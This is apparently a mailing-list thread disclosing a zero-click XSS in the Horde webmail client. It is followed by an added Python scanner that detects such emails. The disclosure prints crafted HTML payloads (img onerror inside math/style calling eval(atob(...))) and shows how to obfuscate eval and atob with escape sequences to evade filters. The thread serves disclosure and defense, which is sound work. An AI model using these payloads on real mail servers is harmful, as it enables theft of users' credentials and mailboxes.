Hi,

is Horde 5.2.23 / 5.2.24 affected?

azurit




Quote "Nataša K. Arh" <natasa.ja...@gmail.com>:

Hi.

I forgot to mention that currently the fastest way to mitigate the
vulnerability is to disable HTML email view and enable only text/plain view
of the email content.


Regards, Tasha & Vito

On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.ja...@gmail.com>
wrote:

Hi.

A vulnerability within Horde Web Client was discovered during our
investigation. We have already seen this vulnerability being exploited in
the wild.

If an attacker crafts a specially prepared email, he/she can abuse this
vulnerability to retrieve username, password and complete email database
of a user mailbox.


*Details*

The content inside the email's base64-encoded text/html boundary contains
specially crafted HTML.


--===============boundary==
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64
MIME-Version: 1.0


Injecting an XSS payload inside an HTML attribute, namely the "onerror"
event handler, the server-side checks do not sanitize the payload and
do not detect HTML-encoded characters.

When the browser renders the page, it will decode and execute the injected
payload.

This is injected at the end of the legit HTML content.


Example:

<html>
<body>
<p>Hi...</p>
Regards<br>
<math><style>
<img style=display:none src=nonexsisting.png onerror="window.parent.eval(window.parent.atob('base64 encoded JavaScript'));">
</style></math>
</body></html>


To evade detection Unicode characters can be used:
For eval:
- \u{065} represents the Unicode character for the letter "e."
- \u{076} represents the Unicode character for the letter "v."
- \141 (octal) or \x6C (hexadecimal) represents the letter "a."
- \x6C represents the hexadecimal for the letter "l."

For atob:
- \u{61} represents the Unicode character for the letter "a."
- \u{74} represents the Unicode character for the letter "t."
- o is a regular character.
- \142 (octal) represents the letter "b."

Example:

<html>
<body>
<p>Hi...</p>
Regards<br>
<math><style><img style=display:none src=nonexsisting.png onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64 encoded JavaScript'))"></style></math>
</body></html>

The “nonexsisting.png” image is searched inside /imp, since it does not
exist the “onerror” content is executed.

A specially crafted JavaScript code inside the 'base64 encoded
JavaScript' is executed.

This kind of crafted email is a zero-click attack, where no click is
needed from the user side other than looking at this email in the Horde web
client.

Since there are still Horde web clients used, it would be nice to fix this
vulnerability.



--
Regards.

--
imp mailing list
Frequently Asked Questions: http://wiki.horde.org/FAQ
To unsubscribe, mail: imp-unsubscr...@lists.horde.org



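As an added defender-side example that is not part of the original posts: a small standard-library Python scanner that decodes a base64 text/html MIME part, resolves HTML entities and the \u{...}/octal/\x JavaScript escapes the thread uses to spell eval and atob, and flags event-handler attributes and a <math>/<svg> element wrapping <style>. The sample message and the 'QUJD' payload stand-in are constructed, and the regexes are a mail-gateway heuristic, not Horde's own sanitizer.

```python
import base64
import html
import re
from email import message_from_bytes
from email.policy import default

# Constructed sample modelled on the thread: one base64 text/html part whose <img onerror>
# sits inside <math><style>, with eval/atob spelled via JS escapes. 'QUJD' is a placeholder.
RAW_HTML = (
    "<html><body><p>Hi...</p>Regards<br><math><style>"
    "<img style=display:none src=nonexsisting.png "
    r"""onerror="window.parent['\u{065}\u{076}\141\x6C']"""
    r"""(window.parent['\u{61}\u{74}o\142']('QUJD'))">"""
    "</style></math></body></html>"
)
SAMPLE_EML = (
    b"From: sender@example.test\r\nTo: victim@example.test\r\nMIME-Version: 1.0\r\n"
    b'Content-Type: text/html; charset="utf-8"\r\nContent-Transfer-Encoding: base64\r\n\r\n'
    + base64.b64encode(RAW_HTML.encode()) + b"\r\n"
)

# JS string escapes used in the thread to hide eval/atob: \u{...}, \uXXXX, \xXX, octal \NNN.
JS_ESCAPE = re.compile(r"\\u\{([0-9a-fA-F]{1,6})\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})")
EVENT_ATTR = re.compile(r"\bon[a-z]+\s*=", re.I)                       # onerror=, onload=, ...
NS_STYLE = re.compile(r"<(math|svg)\b[^>]*>.*?<style\b", re.I | re.S)  # foreign-content wrapper
SINKS = ("eval", "atob", "Function")

def unescape_js(s):
    """Resolve JS string escapes so an obfuscated sink name reads as plain text."""
    def repl(m):
        hex_part = m.group(1) or m.group(2) or m.group(3)
        return chr(int(hex_part, 16)) if hex_part else chr(int(m.group(4), 8))
    return JS_ESCAPE.sub(repl, s)

def scan_html(src):
    """Return finding tags for one decoded text/html body; [] means nothing suspicious."""
    norm = unescape_js(html.unescape(src))  # HTML entities first, then JS escapes
    findings = []
    if EVENT_ATTR.search(norm):
        findings.append("event-handler-attribute")
    if NS_STYLE.search(norm):
        findings.append("math-or-svg-style-wrapper")
    # A sink name that only appears after decoding was hidden from a naive keyword filter.
    findings += ["obfuscated-" + s for s in SINKS if s in norm and s not in src]
    return findings

def scan_message(raw):
    """Decode every text/html part (base64 and charset handled by the email policy) and scan it."""
    msg = message_from_bytes(raw, policy=default)
    return [scan_html(p.get_content()) for p in msg.walk() if p.get_content_type() == "text/html"]
```

Running scan_message(SAMPLE_EML) on the constructed message reports all four findings for its single HTML part; a plain text/plain-only message yields an empty list.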
